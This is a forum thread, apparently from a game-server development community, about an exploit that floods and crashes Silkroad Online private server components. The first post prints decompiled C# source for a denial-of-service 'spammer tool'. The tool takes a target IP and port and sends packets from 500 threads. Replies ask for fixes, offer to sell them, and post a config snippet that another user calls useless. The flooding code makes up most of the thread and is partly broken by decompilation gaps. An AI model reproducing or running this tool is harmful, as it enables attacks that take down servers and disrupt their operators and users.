AgentServer Exploit [New] also [Gateway / Download]

[PlayerSRO]

Hey RageZone ,

Since 2-3 Days we have a new AgentServer Exploit [Spamm 0xA003] and the Modul will Crash / Close if the Status is not online !! also the Server got lags from the Spamm .

i try much ways to fix it but no success ..... but i will try again maybe we can find a way together .



srDos_2 : dosThread.cs

Code:

namespace srDos_2
{
    using SilkroadSecurityApi;
    using System;
    using System.Collections.Generic;
    using System.Diagnostics;
    using System.Net.Sockets;
    using System.Threading;

    public class dosThread
    {
        private static void netThread()
        {
        Label_0000:
            try
            {
                Security security = new Security();
                TransferBuffer buffer = new TransferBuffer(0x1000, 0, 0);
                List<Packet> list = new List<Packet>();
                new Stopwatch();
                new Stopwatch();
                Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                socket.Connect(data.attack.hostname, data.attack.nPort);
                socket.Blocking = false;
                socket.NoDelay = true;
                while (!Console.KeyAvailable)
                {
                    SocketError success;
                    List<Packet> list2;
                    buffer.Size = socket.Receive(buffer.Buffer, 0, buffer.Buffer.Length, SocketFlags.None, out success);
                    if (success != SocketError.Success)
                    {
                        if (success == SocketError.WouldBlock)
                        {
                            goto Label_0094;
                        }
                        goto Label_0201;
                    }
                    if (buffer.Size <= 0)
                    {
                        goto Label_0201;
                    }
                    security.Recv(buffer);
                Label_0094:
                    list2 = security.TransferIncoming();
                    if (list2 != null)
                    {
                        list.AddRange(list2);
                    }
                    if (list.Count > 0)
                    {
                        foreach (Packet packet in list)
                        {
                            packet.GetBytes();
                            Packet packet2 = new Packet( , true);
                            packet2.WriteUInt8((byte) 40);
                            packet2.WriteUInt8((byte) 0);
                            for (int i = 0; i < 750; i++)
                            {
                                security.Send(packet2);
                            }
                            break;
                        }
                    }
                    list.Clear();
                    List<KeyValuePair<TransferBuffer, Packet>> list3 = security.TransferOutgoing();
                    if (list3 != null)
                    {
                        foreach (KeyValuePair<TransferBuffer, Packet> pair in list3)
                        {
                            TransferBuffer key = pair.Key;
                            Packet packet3 = pair.Value;
                            success = SocketError.Success;
                            while (key.Offset != key.Size)
                            {
                                int num2 = socket.Send(key.Buffer, key.Offset, key.Size - key.Offset, SocketFlags.None, out success);
                                if ((success != SocketError.Success) && (success != SocketError.WouldBlock))
                                {
                                    break;
                                }
                                key.Offset += num2;
                                Thread.Sleep(1);
                            }
                            if (success != SocketError.Success)
                            {
                                break;
                            }
                            packet3.GetBytes();
                        }
                        if (success != SocketError.Success)
                        {
                            goto Label_0201;
                        }
                    }
                    Thread.Sleep(10);
                }
            }
            catch (Exception)
            {
            }
        Label_0201:
            Thread.Sleep(10);
            goto Label_0000;
        }

        public void Work()
        {
            try
            {
                new Thread(new ThreadStart(dosThread.netThread)).Start();
            }
            catch (Exception)
            {
                Environment.Exit(0);
            }
        }
    }
}

srDos_2 : data.cs

Code:

namespace srDos_2
{
    using System;
    using System.Runtime.InteropServices;

    internal class data
    {
        [StructLayout(LayoutKind.Sequential, Size=1)]
        public struct attack
        {
            public static string hostname;
            public static string username;
            public static string password;
            public static int nPort;
            public static int nThreads;
            public static int Cosa1;
            public static int Cosa2;
        }
    }
}

also : ServerStats : Program.cs

Code:

namespace ServerStats
{
    using srDos_2;
    using System;
    using System.Runtime.CompilerServices;
    using System.Threading;

    internal class Program
    {
        private static void Main(string[] args)
        {
            Console.WriteLine("Spammer tool (for crash Gateway and Download).");
            Console.WriteLine("");
            Console.Write("IP: ");
            data.attack.hostname = Console.ReadLine();
            Console.Write("Port: ");
            Cosa1 = Console.ReadLine();
            try
            {
                data.attack.nThreads = Convert.ToInt32(500);
                data.attack.nPort = Convert.ToInt32(Cosa1);
            }
            catch (Exception)
            {
                Console.WriteLine("Wrong target");
                Console.ReadKey();
                return;
            }
            Console.WriteLine("Target: {0}:{1}", data.attack.hostname, data.attack.nPort, data.attack.nThreads);
            dosThread thread = new dosThread();
            Thread[] threadArray = new Thread[data.attack.nThreads];
            Console.WriteLine("Close the attack by closing the console.");
            for (int i = 0; i < data.attack.nThreads; i++)
            {
                try
                {
                    threadArray[i] = new Thread(new ThreadStart(thread.Work));
                    threadArray[i].Start();
                    threadArray[i].Join();
                    threadArray[i].Interrupt();
                }
                catch (Exception)
                {
                    Environment.Exit(0);
                }
            }
            Thread.Sleep(0x3e8);
            Console.ReadKey();
        }

        public static string Cosa1
        {
            [CompilerGenerated]
            get
            {
                return <Cosa1>k__BackingField;
            }
            [CompilerGenerated]
            set
            {
                <Cosa1>k__BackingField = value;
            }
        }

        public static string Cosa2
        {
            [CompilerGenerated]
            get
            {
                return <Cosa2>k__BackingField;
            }
            [CompilerGenerated]
            set
            {
                <Cosa2>k__BackingField = value;
            }
        }
    }
}

[MentaL]

[Tazdingo]

This exploit only works when the agentserver status is offline ?

If so block the port of the agent, put it online and then enable the port again.

[BadFist]

already have a fix for block_agent

[eXoTe30]

how you did it? can you share it with us please?

[BadFist]

i need to try more some time don't work some time is working

[InPanic Kev]

how you did it? can you share it with us please?

Hi Murat :D

and ya allrdy Fixed ;)

btw Bad u sure u fix it ? can i try ? ^^

[PlayerSRO]

Hi Murat :D

and ya allrdy Fixed ;)

btw Bad u sure u fix it ? can i try ? ^^

InPanic Kev you are rly crazy and one of the best there can you share please the fix ? or can i buy the Fix ? please send me your Skype .

[chichi]

can i buy the Fix ? please send me your Skype .

- - - Updated - - -

can i buy the Fix ? please send me your Skype .?

[OutOfMemory]

@chichi I can help you just send me your skype in message.

[Apollo1337]

Fix is so easy, solution is by adding that text string to your server.cfg

Code:

AgentServer {
        Certification "xxx.xxx.xxx.xxx, 15882
            traffic_filter_activity     "service_on"
            MaxUser 50000
            SockTCPCount 75000
        MaxConnectionsPerServer         "5000"
        MaxConnectionsPer1_OServer         "5000"
}

[a22345875]

Fix is so easy, solution is by adding that text string to your server.cfg

Code:

AgentServer {
        Certification "xxx.xxx.xxx.xxx, 15882
            traffic_filter_activity     "service_on"
            MaxUser 50000
            SockTCPCount 75000
        MaxConnectionsPerServer         "5000"
        MaxConnectionsPer1_OServer         "5000"
}

Useless

[fanyaodd]

0xA003 AND 0xA004

[blapanda]

"Me server developer, me hosting server no doing care about protection. Money money kings!", thats all.

If you want to get a secure income and profit about your server, you have to use tools against intruders.
You want the money with stolen server files? Do something for it! Buy an anti-ddos guard or use other tricks to decrease the connection and ping attempts done to your auth server.

... I should create a meme, alike this one:

instead of that ... rather with devz.
Or well, those are fitting as well, since you guys have no brains and going straight for money digging.
Wow ... its truely the same. Dull and fake.